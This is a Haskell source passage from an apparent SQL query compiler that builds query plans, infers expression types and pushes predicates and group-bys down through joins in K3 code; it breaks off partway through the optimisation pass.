
-- | Merge two frames, dropping unqualified bindings for attributes common
--   to both sides (which must then be referenced via qualifiers).
mergeScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
mergeScopeFrames lsf@(_, lord, lquals) rsf@(_, rord, rquals) = do
  let common = lord `intersect` rord
  let nord = (nub $ lord ++ rord) \\ common
  ((lu,lq), (ru,rq)) <- (,) <$> partitionAttrEnv lsf <*> partitionAttrEnv rsf
  let nu = (foldl (flip Map.delete) lu common) <> (foldl (flip Map.delete) ru common)
  return (nu <> lq <> rq, nord, lquals ++ rquals)

-- | Merge two registered scopes and push the result as a new scope.
mergeScopes :: ScopeId -> ScopeId -> SQLParseM ScopeId
mergeScopes id1 id2 = do
  (lsf, rsf) <- (,) <$> sqclkupM id1 <*> sqclkupM id2
  nsf <- mergeScopeFrames lsf rsf
  sqcpushM nsf
-- | Apply an optional table alias to an output type, generating a fresh
--   qualifier name (prefix + fresh symbol) when none is supplied.
outputTypeAndQualifier :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM (K3 Type, Maybe Identifier)
outputTypeAndQualifier t pfx alOpt = do
  sym <- sasextM
  case alOpt of
    Nothing -> return (t, Just $ pfx ++ show sym)
    Just al -> (,) <$> taliascolM al t <*> return (sqltablealias (pfx ++ show sym) al)

-- | Build a fresh output scope for a collection type, under an optional alias.
typedOutputScope :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
typedOutputScope t pfx alOpt = do
  (rt, tid) <- outputTypeAndQualifier t pfx alOpt
  sqgextSchemaM tid rt

-- | Build a fresh output scope over an existing scope's type.
outputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
outputScope sid pfx alOpt = do
  t <- scopeType sid
  typedOutputScope t pfx alOpt

-- | Build a fresh output scope whose attributes alias the given scope's
--   attributes (recording derivations in the attribute graph).
aliasedOutputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
aliasedOutputScope sid pfx alOpt = do
  (t, ptrs) <- (,) <$> scopeType sid <*> sqcfptrsM sid
  (rt, tid) <- outputTypeAndQualifier t pfx alOpt
  sqgextAliasM tid rt ptrs

-- | Build a fresh output scope of computed attributes over a given scope.
exprOutputScope :: ScopeId -> Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
exprOutputScope sid pfx exprs = do
  sym <- sasextM
  let qual = Just $ pfx ++ show sym
  sqgextExprM sid qual exprs
-- | The binding map that nests attributes under an "elem" prefix.
bmelem :: BindingMap
bmelem = BMTPrefix "elem"

-- | The plan node at the root of a plan tree.
ttag :: PlanTree -> PlanNode
ttag = rootLabel

-- | Replace a tree's root label, keeping its children.
replaceData :: Tree a -> a -> Tree a
replaceData t n = t { rootLabel = n }

-- | True for join nodes with at least one equality and no other predicates.
isEquiJoin :: PlanTree -> Bool
isEquiJoin t = case ttag t of
  PJoin _ _ _ (_:_) [] _ _ -> True
  _                        -> False

-- | True for any join node.
isJoin :: PlanTree -> Bool
isJoin t = case ttag t of
  PJoin {} -> True
  _        -> False
-- | Attempt an attribute-path lookup in an optional scope, running the
--   failure action when the scope is absent or the path unbound, and the
--   success continuation on the resolved graph pointer otherwise.
trypath :: Maybe ScopeId -> SQLParseM a -> (ADGPtr -> SQLParseM a) -> AttrPath -> SQLParseM a
trypath sidOpt rfail rsuccess path = (\f -> maybe rfail f sidOpt) $ \sid -> do
  pOpt <- sqcftrylkupM sid path
  maybe rfail rsuccess pOpt

-- | True for chain stages with no group-bys and no projections
--   (i.e. aggregate-only stages).
isAggregatePath :: PlanCPath -> Bool
isAggregatePath (PlanCPath _ _ [] [] _ _ _) = True
isAggregatePath _ = False

-- | True for chain stages with both group-bys and aggregates.
isGroupByAggregatePath :: PlanCPath -> Bool
isGroupByAggregatePath (PlanCPath _ _ (_:_) _ (_:_) _ _) = True
isGroupByAggregatePath _ = False

-- | True for chain stages with no group-bys, aggregates or having clause.
isNonAggregatePath :: PlanCPath -> Bool
isNonAggregatePath (PlanCPath _ _ [] _ [] Nothing _) = True
isNonAggregatePath _ = False
-- | The stage chain attached to a plan node; for subqueries, the chain of
--   the nested plan (which may itself be absent).
planNodeChains :: PlanNode -> Maybe [PlanCPath]
planNodeChains n = case n of
  PJoin _ _ _ _ _ _ chains -> Just chains
  PTable _ _ _ _ chains    -> Just chains
  PSubquery _ qcl          -> queryClosureChains qcl

-- | The stage chain at the root of a plan tree.
treeChains :: PlanTree -> Maybe [PlanCPath]
treeChains t = planNodeChains (rootLabel t)

-- | A plan's top-level chain, falling back to the join tree's root chain
--   when the top-level chain is empty.
queryPlanChains :: QueryPlan -> Maybe [PlanCPath]
queryPlanChains (QueryPlan tOpt chains _)
  | null chains = tOpt >>= treeChains
  | otherwise   = Just chains

-- | The chain of a closure's underlying plan.
queryClosureChains :: QueryClosure -> Maybe [PlanCPath]
queryClosureChains = queryPlanChains . qcplan
-- | Append a chain stage to the root node of a plan tree (descending into
--   a subquery node's nested plan).
pcext :: PlanCPath -> PlanTree -> SQLParseM PlanTree
pcext p (Node n ch) = case n of
    PJoin psid osid jt jeq jp jpb chains -> return $ Node (PJoin psid osid jt jeq jp jpb $ chains ++ [p]) ch
    PTable i tsid trOpt bmOpt chains -> return $ Node (PTable i tsid trOpt bmOpt $ chains ++ [p]) ch
    PSubquery osid qcl -> pcextclosure p qcl >>= \nqcl -> return $ Node (PSubquery osid nqcl) ch

  where pcextclosure p (QueryClosure fvs plan) = pcextplan p plan >>= \nplan -> return $ QueryClosure fvs nplan
        pcextplan p (QueryPlan tOpt chains stgOpt) = return $ QueryPlan tOpt (chains ++ [p]) stgOpt

-- | Add a selection predicate (and its subquery bindings) to a chain,
--   creating a fresh select-only stage when the chain is empty and
--   extending the last stage otherwise.
pcextSelect :: ScopeId -> SubqueryBindings -> ScalarExpr -> [PlanCPath] -> [PlanCPath]
pcextSelect sid qbs p [] = [PlanCPath sid [p] [] [] [] Nothing qbs]
pcextSelect _ qbs p pcl@(last -> c) = init pcl ++ [c {pcselects = pcselects c ++ [p], pcbindings = pcbindings c ++ qbs}]

-- | Append a group-by/aggregate stage to a plan node's chain, computing
--   the stage's output schema from the current end-of-chain schema.
pcextGroupBy :: SelectItemList -> SelectItemList -> PlanNode -> SQLParseM PlanNode
pcextGroupBy gbs aggs n@(PJoin _ osid _ _ _ _ chains) = do
  aggsid <- aggregateSchema (Just $ chainSchema osid chains) gbs aggs
  return $ n { pnjpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }

pcextGroupBy gbs aggs n@(PTable _ sid _ _ chains) = do
  aggsid <- aggregateSchema (Just $ chainSchema sid chains) gbs aggs
  return $ n { pntpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }

pcextGroupBy gbs aggs n@(PSubquery _ qcl) = extPlan (qcplan qcl) >>= \p -> return $ n { pnqclosure = qcl { qcplan = p } }
  where extPlan p@(QueryPlan tOpt chains stgOpt) = do
          sid <- planSchema p
          aggsid <- aggregateSchema (Just sid) gbs aggs
          return $ QueryPlan tOpt (chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []]) stgOpt

-- | Per-stage non-aggregate expressions (selects, group-bys, projections),
--   each paired with the scope in which it is evaluated.
pcNonAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcNonAggExprs _ [] = []
pcNonAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
  where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
        extract sid' (PlanCPath _ selects groupbys projects _ _ _) = (sid', selects ++ groupbys ++ projectionexprs projects)

-- | Per-stage aggregate expressions, each paired with its evaluation scope.
pcAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcAggExprs _ [] = []
pcAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
  where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
        extract sid' (PlanCPath _ _ _ _ aggs _ _) = (sid', projectionexprs aggs)
-- | The output scope at the end of a chain, or the input scope when empty.
chainSchema :: ScopeId -> [PlanCPath] -> ScopeId
chainSchema sid chains = if null chains then sid else pcoutsid $ last chains

-- | The output scope of a plan tree's root node.
treeSchema :: PlanTree -> SQLParseM ScopeId
treeSchema (ttag -> PJoin _ sid _ _ _ _ chains) = return $ chainSchema sid chains
treeSchema (ttag -> PSubquery sid _) = return sid
treeSchema (ttag -> PTable _ sid _ _ chains) = return $ chainSchema sid chains
treeSchema _ = throwE "Invalid plan node input for treeSchema"

-- | The output scope of a whole query plan.
planSchema :: QueryPlan -> SQLParseM ScopeId
planSchema (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
planSchema (QueryPlan (Just t) [] _) = treeSchema t
planSchema (QueryPlan _ chains _) = return $ pcoutsid $ last chains
-- | Compute the output scope of a group-by/aggregate stage: typed from the
--   projection and aggregate expressions, either as a fresh schema (no
--   input scope) or as computed attributes over the input scope.
aggregateSchema :: Maybe ScopeId -> SelectItemList -> SelectItemList -> SQLParseM ScopeId
aggregateSchema (Just sid) [] [] = return sid
aggregateSchema sidOpt projects aggregates = do
    let pexprs = projectionexprs projects
    let aexprs = projectionexprs aggregates
    -- Generate output field names, numbering unnamed items contiguously.
    (prji, prjids) <- foldM selectItemIdAcc (0, []) projects
    (_, aggids) <- foldM selectItemIdAcc (prji, []) aggregates
    prjt <- mapM (scalarexprType sidOpt) pexprs
    aggt <- mapM (aggregateType sidOpt) aexprs
    case sidOpt of
      Nothing -> typedOutputScope (recT $ zip prjids prjt ++ zip aggids aggt) "__RN" Nothing
      Just sid -> exprOutputScope sid "__AGG" $ (zip3 prjids prjt pexprs) ++ (zip3 aggids aggt aexprs)
-- | Recompute a join node's processing and output scopes from the schemas
--   of its (possibly rewritten) children; leaf nodes pass through.
refreshInputSchema :: PlanNode -> [PlanTree] -> SQLParseM PlanNode
refreshInputSchema (PJoin _ _ jt jeq jp jpb chains) [l,r] = do
  (lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
  jpsid <- mergeScopes lsid rsid
  josid <- outputScope jpsid "__JR" Nothing
  return $ PJoin jpsid josid jt jeq jp jpb chains

refreshInputSchema n [] = return n
refreshInputSchema _ _ = throwE "Invalid plan tree node for refreshInputSchema"
-- | The K3 collection-of-records type of a scope's unqualified attributes,
--   in attribute order.
scopeType :: ScopeId -> SQLParseM (K3 Type)
scopeType sid = do
  sf@(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
  ptrs <- mapM (\path -> liftExceptM $ sflkup sf path) ord
  nodes <- mapM sqglkupM ptrs
  tcolM $ recT $ map (adnn &&& adnt) nodes
-- | The K3 type of a scope's value under a binding map: direct, nested
--   under a prefix label, or restructured field-by-field via type paths.
--   Variable-partition maps are not supported here.
k3ScopeType :: ScopeId -> BindingMap -> SQLParseM (K3 Type)
k3ScopeType sid bm = do
    t <- scopeType sid
    rt <- telemM t
    case (tnc rt, bm) of
      ((TRecord ids, ch), BMNone) -> return t
      ((TRecord ids, ch), BMTPrefix j) -> tcolM $ recT [(j,rt)]
      ((TRecord ids, ch), BMTFieldMap fb) -> namedRecordT fb (zip ids ch) >>= tcolM
      ((TRecord ids, ch), BMTVPartition pb) -> throwE "BMTVPartition mapping unsupported in k3ScopeType"
      _ -> throwE "Invalid k3ScopeType element type"

  where
    -- Rebuild a (possibly nested) record by placing each field at the
    -- type path assigned to it by the field map.
    namedRecordT fb idt = foldM (field fb) [] idt >>= return . recT
    field fb acc (j,t) = maybe (err j) (extendNestedRecord t acc) $ Map.lookup j fb

    extendNestedRecord _ fieldsAcc [] = throwE "Invalid nested record extension"
    extendNestedRecord t fieldsAcc [i] = return $ fieldsAcc ++ [(i,t)]
    extendNestedRecord t fieldsAcc (h:rest) =
      case lookup h fieldsAcc of
        Nothing -> do
          subfields <- extendNestedRecord t [] rest
          return $ fieldsAcc ++ [(h, recT subfields)]

        Just (tnc -> (TRecord ids, tch)) -> do
          subfields <- extendNestedRecord t (zip ids tch) rest
          return $ map (replaceField h $ recT subfields) fieldsAcc

        Just _ -> throwE $ "Existing non-record field when attempting to extend nested record"

    replaceField dst nt (src,t) | src == dst = (dst, nt)
                                | otherwise = (src, t)

    err j = throwE $ "No field binding found in namedRecordT for " ++ show j
-- | The K3 type produced by a plan under a binding map. Plans ending in an
--   aggregate-only stage yield a zero/accumulator type for the record.
k3PlanType :: BindingMap -> QueryPlan -> SQLParseM (K3 Type)
k3PlanType _ (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
k3PlanType bm p = do
  sid <- planSchema p
  case queryPlanChains p of
    Just [] -> k3ScopeType sid bm
    Just l | isAggregatePath (last l) -> do
      t <- k3ScopeType sid bm
      rt <- telemM t
      case tnc rt of
        (TRecord ids, ch) -> zeroT $ zip ids ch
        _ -> throwE "Invalid k3 aggregate plan type"
    _ -> k3ScopeType sid bm
-- TODO (HsSqlPpp AST forms not yet handled): AggregateFn, Extract,
-- Interval, LiftOperator, NullLit, Placeholder, PositionalArg, WindowFn.
-- | Infer the K3 type of a SQL scalar expression, resolving identifiers
--   against the optional scope. Unresolvable identifiers yield TC.bottom
--   (with a debug trace) rather than failing.
scalarexprType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
scalarexprType _ (BooleanLit _ _) = return TC.bool
scalarexprType _ (StringLit _ _) = return TC.string
-- Numeric literals containing a '.' are reals; otherwise ints.
scalarexprType _ (NumberLit _ i) = return $ if "." `isInfixOf` i then TC.real else TC.int
scalarexprType _ (TypedStringLit _ tn _) = sqlnamedtype tn
scalarexprType _ (Cast _ _ tn) = sqlnamedtype tn

scalarexprType sidOpt (Identifier _ (sqlnmcomponent -> i)) = do
  sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
  trypath sidOpt (trace (unwords ["bottom", i, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) [i]

scalarexprType sidOpt (QIdentifier _ (sqlnmpath -> path)) = do
  sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
  trypath sidOpt (trace (unwords ["bottom", show path, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) path

-- Case expressions take the type of the else branch, or of the first when.
scalarexprType sidOpt (Case _ whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (CaseSimple _ expr whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr

scalarexprType sidOpt (FunCall _ nm args) = do
  let fn = sqlnm nm
  case sqloperator fn args of
    (Just (UnaryOp _ x)) -> scalarexprType sidOpt x
    -- Binary operands must agree on type; the common type is the result.
    (Just (BinaryOp _ x y)) -> do
      xt <- scalarexprType sidOpt x
      yt <- scalarexprType sidOpt y
      if xt == yt then return xt
                  else throwE $ boxToString $ ["Binary operator sql type mismatch"]
                                                %$ prettyLines xt %$ prettyLines yt

    _ -> do
      case (fn, args) of
        ("!between", [_,_,_]) -> return TC.bool
        ("!like", [_,_]) -> return TC.bool
        ("!notlike", [_,_]) -> return TC.bool
        (_, _) -> throwE $ "Unsupported function in scalarexprType: " ++ fn

-- Star yields the scope's full element record type.
scalarexprType (Just sid) (Star _) = scopeType sid >>= telemM

-- Qualified star yields the record of attributes under that qualifier.
scalarexprType (Just sid) (QStar _ (sqlnmcomponent -> n)) = do
  (fr,_,_) <- sqclkupM sid
  let ptrs = Map.elems $ Map.filterWithKey (\k _ -> [n] `isPrefixOf` k) fr
  idt <- mapM (\p -> sqglkupM p >>= return . (adnn &&& adnt)) ptrs
  return $ recT idt

scalarexprType _ (Exists _ _) = return TC.bool
scalarexprType _ (InPredicate _ _ _ _) = return TC.bool

scalarexprType _ e = throwE $ "Type inference unsupported for: " ++ show e
-- | Type of a CASE expression's branch list: all branches are assumed to
--   share the type of the first result expression; an empty list is invalid.
caselistType :: Maybe ScopeId -> [([ScalarExpr], ScalarExpr)] -> SQLParseM (K3 Type)
caselistType sidOpt whens =
  case whens of
    ((_, firstResult):_) -> scalarexprType sidOpt firstResult
    []                   -> throwE $ "Invalid empty case-list in caselistType"
-- | Result type of a SQL aggregate call: @count@ yields an int, while
--   @sum@/@min@/@max@ take on the type of their argument expression.
--   Anything else is rejected as an invalid aggregate.
aggregateType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
aggregateType sidOpt (FunCall _ nm [arg])
  | fname == "count" = return TC.int
  | fname `elem` ["sum", "min", "max"] = scalarexprType sidOpt arg
  where fname = sqlnm nm
aggregateType _ agg = throwE $ "Invalid aggregate expression: " ++ show agg
-- | Assigns an output column name to a select item, threading a counter used
--   to synthesize names ("f<i>") for anonymous expressions. Named identifiers
--   and aliased items keep their own names and leave the counter unchanged.
selectItemId :: Int -> SelectItem -> SQLParseM (Int, Identifier)
selectItemId ctr item = return $
  case item of
    SelExp _ (Identifier _ (Nmc n))      -> (ctr, n)
    SelExp _ _                           -> (ctr + 1, "f" ++ show ctr)
    SelectItem _ _ (sqlnmcomponent -> n) -> (ctr, n)
-- | Accumulating variant of 'selectItemId': folds over select items,
--   appending each item's output column name while threading the
--   synthetic-name counter. Delegates to 'selectItemId' so the naming rules
--   live in exactly one place (the previous version duplicated them clause
--   by clause).
selectItemIdAcc :: (Int, [Identifier]) -> SelectItem -> SQLParseM (Int, [Identifier])
selectItemIdAcc (i, acc) si = do
  (ni, n) <- selectItemId i si
  return (ni, acc ++ [n])
-- | Default binding map for a plan node: join nodes bind their element
--   record, every other node carries no binding information.
nodeBindingMap :: PlanNode -> SQLParseM BindingMap
nodeBindingMap node = return $
  case node of
    PJoin _ _ _ _ _ _ _ -> bmelem
    _                   -> BMNone
-- | Binding map for a plan chain path. Paths without group-bys or aggregates
--   bind the plain element; otherwise projections are mapped under the "key"
--   prefix and aggregates under "value", mirroring the group_by result shape.
chainBindingMap :: PlanCPath -> SQLParseM BindingMap
chainBindingMap (PlanCPath _ _ gbs prjs aggs _ _)
  | null gbs && null aggs = return bmelem
  | otherwise = do
      (prji, prjids) <- foldM selectItemIdAcc (0, []) prjs
      (_, aggids) <- foldM selectItemIdAcc (prji, []) aggs
      let (nidx, keyPaths) = prefixTypePath (0::Int) "key" prjids
      let (_, valPaths) = prefixTypePath nidx "value" aggids
      return $ BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
  -- An empty field list synthesizes a placeholder name, a singleton collapses
  -- onto the prefix itself, and larger lists nest each field under the prefix.
  where prefixTypePath i pfx l = case l of
          []  -> (i+1, [("f" ++ show i, [pfx])])
          [j] -> (i, [(j, [pfx])])
          _   -> (i, map (\j -> (j, [pfx, j])) l)
-- | Binding map of a plan tree: taken from the last chain path when a
--   non-empty chain exists, otherwise derived from the root node itself.
treeBindingMap :: PlanTree -> SQLParseM BindingMap
treeBindingMap t =
  case treeChains t of
    Just chains@(_:_) -> chainBindingMap $ last chains
    _                 -> nodeBindingMap $ ttag t
-- | Binding map of a full query plan: the last chain path wins when chains
--   exist; otherwise the plan tree's binding map is used. A plan with neither
--   a tree nor chains is invalid.
planBindingMap :: QueryPlan -> SQLParseM BindingMap
planBindingMap (QueryPlan tOpt chains _)
  | not (null chains) = chainBindingMap $ last chains
  | otherwise = maybe (throwE "Invalid query plan with empty tree and chains") treeBindingMap tOpt
-- | True when a type path starts with the "key" or "value" component.
keyValuePrefix :: TypePath -> Bool
keyValuePrefix tp = any (\pfx -> [pfx] `isPrefixOf` tp) ["key", "value"]
-- | True when a type mapping targets a "key"/"value" prefix, either as a
--   direct prefix name or via a type path; an absent mapping never matches.
keyValueMapping :: TypeMapping -> Bool
keyValueMapping = maybe False $ either (`elem` ["key", "value"]) keyValuePrefix
-- | Checks whether every entry of a binding map is key/value shaped.
--   Maps other than field maps and partition maps are never key-value.
isKVBindingMap :: BindingMap -> SQLParseM Bool
isKVBindingMap bm = return $
  case bm of
    BMTFieldMap fields       -> all keyValuePrefix $ Map.elems fields
    BMTVPartition partitions -> all (keyValueMapping . snd) $ Map.elems partitions
    _                        -> False
-- | Attribute-graph pointers referenced by a scalar expression: identifiers
--   resolve to a single pointer, function calls union their arguments'
--   pointers, and every other expression contributes none.
exprAttrs :: ScopeId -> ScalarExpr -> SQLParseM [ADGPtr]
exprAttrs sid expr =
  case expr of
    Identifier _ (sqlnmcomponent -> i) -> (:[]) <$> sqcflkupM sid [i]
    QIdentifier _ (sqlnmpath -> path)  -> (:[]) <$> sqcflkupM sid path
    FunCall _ _ args                   -> concat <$> mapM (exprAttrs sid) args
    _                                  -> return []
-- | Distinct attribute pointers bound in a scope frame's attribute environment.
attrEnvPtrs :: ScopeFrame -> [ADGPtr]
attrEnvPtrs (env, _, _) = nub (Map.elems env)
-- | Chases an attribute-dependency-graph pointer down to terminal nodes,
--   stopping at cycles, at designated root pointers, and at childless nodes.
--   Returns each stopping point paired with its node.
adgchaseM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseM roots ptr = sqglkupM ptr >>= \n -> chase [] ptr n
  where chase path p n
          -- Revisited pointer (cycle) or explicit root: stop here.
          | p `elem` path || p `elem` roots = return [(p, n)]
          -- Leaf of the dependency graph.
          | null (adnch n) = return [(p, n)]
          | otherwise = mapM (\c -> sqglkupM c >>= chase (path ++ [p]) c) (adnch n) >>= return . concat
-- | Iteratively inlines attribute definitions into an expression,
--   substituting each non-root attribute by its defining expression until
--   only root (or already-substituted) pointers remain.
adgchaseExprM :: [ADGPtr] -> ScopeId -> ScalarExpr -> SQLParseM ScalarExpr
adgchaseExprM roots sid expression = exprAttrs sid expression >>= \ptrs -> chase [] expression ptrs
  where chase path e ptrs = do
          -- Only pointers that are neither roots nor previously expanded remain.
          let remptrs = filter (\p -> p `notElem` roots && p `notElem` path) ptrs
          if null remptrs
            then return e
            else do
              nodes <- mapM sqglkupM remptrs
              -- Substitution environment from nodes carrying a defining expression.
              let env = concatMap (\(i,eOpt) -> maybe [] (\e' -> [(i,e')]) eOpt) $ map (adnn &&& adne) nodes
              ne <- substituteExpr env e
              chase (path ++ remptrs) ne $ concatMap adnch nodes
-- | Like 'adgchaseM', but accumulates every node visited along the chase
--   (including the starting node) rather than only the terminal ones.
adgchaseNodesM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseNodesM roots ptr = sqglkupM ptr >>= \node -> chase [(ptr,node)] [] ptr node
  where chase acc path p n
          -- Stop on cycles, roots, or leaves; the accumulator already holds n.
          | p `elem` path || p `elem` roots || null (adnch n) = return acc
          | otherwise = foldM (rcr p path) acc (adnch n)
        rcr p path acc cp = sqglkupM cp >>= \cn -> chase (acc ++ [(cp,cn)]) (path ++ [p]) cp cn
-- | Base relation names reachable from an attribute pointer.
baseRelationsP :: ADGPtr -> SQLParseM [Identifier]
baseRelationsP ptr = do
  chased <- adgchaseM [] ptr
  return $ nub $ catMaybes $ map (adnr . snd) chased
-- | Base relation names transitively referenced by a scalar expression.
baseRelationsE :: ScopeId -> ScalarExpr -> SQLParseM [Identifier]
baseRelationsE sid expression = do
  ptrs   <- exprAttrs sid expression
  chased <- mapM (adgchaseM []) ptrs
  return $ nub $ catMaybes $ map (adnr . snd) $ concat chased
-- | Base relation names underlying every attribute of a scope.
baseRelationsS :: ScopeId -> SQLParseM [Identifier]
baseRelationsS sid = do
  ptrs   <- sqcfptrsM sid
  chased <- mapM (adgchaseM []) ptrs
  return $ nub $ catMaybes $ map (adnr . snd) $ concat chased
-- | Rewrites attribute pointers in terms of the given root pointers.
rebaseAttrsToRoots :: [ADGPtr] -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrsToRoots roots ptrs = do
  chased <- mapM (adgchaseM roots) ptrs
  return $ nub $ map fst $ concat chased
-- | Rebases attribute pointers onto the attribute environment of a scope.
rebaseAttrs :: ScopeId -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrs sid ptrs = do
  frame <- sqclkupM sid
  rebaseAttrsToRoots (attrEnvPtrs frame) ptrs
-- | Rebases each expression by inlining attribute definitions down to the
--   given root pointers.
rebaseExprsToRoots :: ScopeId -> [ADGPtr] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprsToRoots sid roots = traverse (adgchaseExprM roots sid)
-- | Rebases expressions from a source scope onto the combined attribute
--   environments of the given destination scopes.
rebaseExprs :: ScopeId -> [ScopeId] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprs ssid dsidl exprs = do
  frames <- mapM sqclkupM dsidl
  rebaseExprsToRoots ssid (nub $ concatMap attrEnvPtrs frames) exprs
-- | Rebases the expression inside each select item onto the given roots,
--   preserving any column alias.
rebaseSelectItemsToRoots :: ScopeId -> [ADGPtr] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItemsToRoots ssid roots = mapM rebase
  where rebase (SelExp ann e)         = SelExp ann <$> adgchaseExprM roots ssid e
        rebase (SelectItem ann e nmc) = (\ne -> SelectItem ann ne nmc) <$> adgchaseExprM roots ssid e
-- | Rebases select items from a source scope onto the combined attribute
--   environments of the given destination scopes.
rebaseSelectItems :: ScopeId -> [ScopeId] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItems ssid dsidl items = do
  frames <- mapM sqclkupM dsidl
  rebaseSelectItemsToRoots ssid (nub $ concatMap attrEnvPtrs frames) items
-- | Partitions expressions over a join scope into those computable purely
--   from the left input, purely from the right input, or requiring both.
localizeInputExprs :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM (ScalarExprList, ScalarExprList, ScalarExprList)
localizeInputExprs sid lsid rsid exprs = do
  [lfr, rfr] <- mapM sqclkupM [lsid, rsid]
  let (lroots, rroots) = (nub $ attrEnvPtrs lfr, nub $ attrEnvPtrs rfr)
  foldM (localize lroots rroots $ nub $ concat [lroots, rroots]) ([], [], []) exprs
  where
    localize lroots rroots roots (lacc, racc, acc) e = do
      eptrs <- exprAttrs sid e
      reptrs <- rebaseAttrsToRoots roots eptrs
      -- An expression is local to one side when all of its rebased pointers
      -- fall within that side's roots; otherwise it needs both inputs.
      return $
        if reptrs `intersect` lroots == reptrs then (lacc++[e], racc, acc)
        else if reptrs `intersect` rroots == reptrs then (lacc, racc++[e], acc)
        else (lacc, racc, acc++[e])
-- | Lowers SQL statements to SQLDecls: table definitions are registered in
--   the parser state, and each query is planned (with predicate pushdown and
--   group-by pushdown) into a QueryPlan.
sqloptimize :: [Statement] -> SQLParseM [SQLDecl]
sqloptimize l = mapM stmt l
  where
    -- CREATE TABLE: register the relation's type and emit a relation decl.
    stmt (CreateTable _ nm attrs _) = do
      t <- sqltabletype attrs
      sqrextM (sqlnm nm) t
      return $ SQLRel (sqlnm nm, t)

    stmt (QueryStatement _ q) = do
      qcl <- query q
      return $ SQLQuery $ qcplan qcl

    stmt s = throwE $ "Unimplemented SQL stmt: " ++ show s

    query (Select _ _ selectL tableL whereE gbL havingE _ _ _) = queryPlan selectL tableL whereE gbL havingE
    query q = throwE $ "Unhandled query " ++ show q

    -- Plans a single select block. With no FROM clause, projections and
    -- aggregates form a single chain path. Otherwise the join tree is built,
    -- WHERE conjuncts are pushed down, and group-bys are pushed below joins
    -- where possible; free variables from all fragments form the closure.
    queryPlan selectL tableL whereE gbL havingE = do
      tfvOpt <- joinTree tableL
      case tfvOpt of
        Nothing -> do
          (prjs, aggs, gsid) <- aggregatePath Nothing selectL
          (efvs, subqs) <- varsAndQueries Nothing $ projectionexprs $ prjs ++ aggs
          return $ QueryClosure efvs $ QueryPlan Nothing [PlanCPath gsid [] [] prjs aggs Nothing subqs] Nothing

        Just (t, fvs) -> do
          sid <- treeSchema t
          conjuncts <- maybe (return []) splitConjuncts whereE
          (nt, remconjuncts) <- predicatePushdown (Just sid) conjuncts t
          (prjs, aggs, gsid) <- aggregatePath (Just sid) selectL
          -- A bare scan (no residual predicates, group-bys, projections or
          -- aggregates) needs no chain path at all.
          if all null [remconjuncts, gbL, projectionexprs prjs, projectionexprs aggs]
            then return $ QueryClosure fvs $ QueryPlan (Just nt) [] Nothing
            else do
              (gnt, naggs) <- if null gbL then return (nt, aggs) else groupByPushdown nt sid (map mkprojection gbL) aggs
              (efvs, subqs) <- debugGBPushdown gnt
                                 $ varsAndQueries (Just sid) $ remconjuncts ++ gbL ++ (projectionexprs $ prjs ++ naggs)
              (hfvs, hsubqs) <- maybe (return ([], [])) (\e -> varsAndQueries (Just gsid) [e]) havingE
              let chains = [PlanCPath gsid remconjuncts gbL prjs naggs havingE $ subqs ++ hsubqs]
              return $ QueryClosure (nub $ fvs ++ efvs ++ hfvs) $ QueryPlan (Just gnt) chains Nothing

    -- NOTE(review): the guard is `if False`, so the trace branch is ALWAYS
    -- taken; confirm whether the flag was meant to disable the trace.
    debugGBPushdown x y = if False then y else trace (boxToString $ ["GB pushdown result"] %$ prettyLines x) y

    -- Left-deep fold of the FROM list into a cross-product join tree.
    joinTree [] = return Nothing
    joinTree (h:t) = do
      n <- unaryNode h
      (tree, tfvs) <- foldM binaryNode n t
      return $ Just (tree, tfvs)

    -- Cross product ("__CP") of the accumulated tree with the next FROM item.
    binaryNode (lhs, lfvs) n = do
      (rhs, rfvs) <- unaryNode n
      (lsid, rsid) <- (,) <$> treeSchema lhs <*> treeSchema rhs
      jpsid <- mergeScopes lsid rsid
      josid <- aliasedOutputScope jpsid "__CP" Nothing
      return (Node (PJoin jpsid josid Nothing [] [] [] []) [lhs, rhs], nub $ lfvs ++ rfvs)

    -- Leaves: base tables, subqueries, and explicit JOIN clauses.
